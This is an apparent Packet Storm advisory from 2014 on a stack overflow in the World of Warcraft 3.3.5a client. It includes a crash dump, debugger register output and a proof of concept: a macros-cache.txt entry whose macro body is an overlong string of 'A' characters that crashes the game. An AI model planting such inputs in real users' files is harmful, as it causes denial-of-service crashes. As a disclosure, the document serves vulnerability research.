World Of Warcraft 3.3.5a Stack Overflow

2014-07-21T00:00:00
ID PACKETSTORM:127547
Type packetstorm
Reporter Alireza Chegini
Modified 2014-07-21T00:00:00

Description

                                        
                                            `# Exploit Title: World Of Warcraft 3.3.5a Stack Overflow (macros-cache.txt)  
# Date: 21 Jul 2014  
# Exploit Author: Alireza Chegini (@nimaarek)  
# Vendor Homepage: http://us.battle.net/wow/  
# Version: 3.3.5a  
# Tested on: Win7  
  
Output:  
  
--WoWError [CrashDUmp] :  
World of WarCraft (build 12340)  
  
Exe: D:\Wow\Wow.exe  
Time: Jul 21, 2014 6:10:08.243 PM  
User: nimaarek  
Computer: NIMAAREK-L  
------------------------------------------------------------------------------  
  
This application has encountered a critical error:  
  
ERROR #132 (0x85100084) Fatal Exception  
Program: D:\Wow\Wow.exe  
Exception: 0xC00000FD (STACK_OVERFLOW) at 0023:0040BB77  
  
--Windbg result:  
0:020> g  
ModLoad: 6c670000 6c6a0000 C:\Windows\SysWOW64\wdmaud.drv  
ModLoad: 6d3a0000 6d3a4000 C:\Windows\SysWOW64\ksuser.dll  
ModLoad: 6c660000 6c667000 C:\Windows\SysWOW64\AVRT.dll  
ModLoad: 6c610000 6c618000 C:\Windows\SysWOW64\msacm32.drv  
ModLoad: 6c600000 6c607000 C:\Windows\SysWOW64\midimap.dll  
ModLoad: 71e50000 71e66000 C:\Windows\SysWOW64\CRYPTSP.dll  
ModLoad: 71e10000 71e4b000 C:\Windows\SysWOW64\rsaenh.dll  
(3a8.470): Stack overflow - code c00000fd (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Wow.exe -   
eax=02af2000 ebx=050c1f6e ecx=00000000 edx=00000000 esi=17b28f50 edi=00000000  
eip=0040bb77 esp=032eed00 ebp=032ef92c iopl=0 nv up ei pl nz na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206  
Wow+0xbb77:  
0040bb77 8500 test dword ptr [eax],eax ds:002b:02af2000=00000000  
==============================================================================  
Poc :  
%systemroot%\Wow\WTF\Account\[AccountName]\macros-cache.txt  
  
MACRO 1 "Decursive" INV_Misc_QuestionMark  
/stopcasting  
/cast [target=mouseover,nomod,exists] Dispel Magic; [target=mouseover,exists,mod:ctrl] Abolish Disease; [target=mouseover,exists,mod:shift] Dispel Magic  
END  
MACRO 2 "PoC" INV_Misc_QuestionMark  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA x n+1 :-)  
END  
==============================================================================  
Greetz to My Friend : promoh3nv , AmirHosein Nemati , b3hz4d And Head Administrator of ST-Team [RadoN]  
`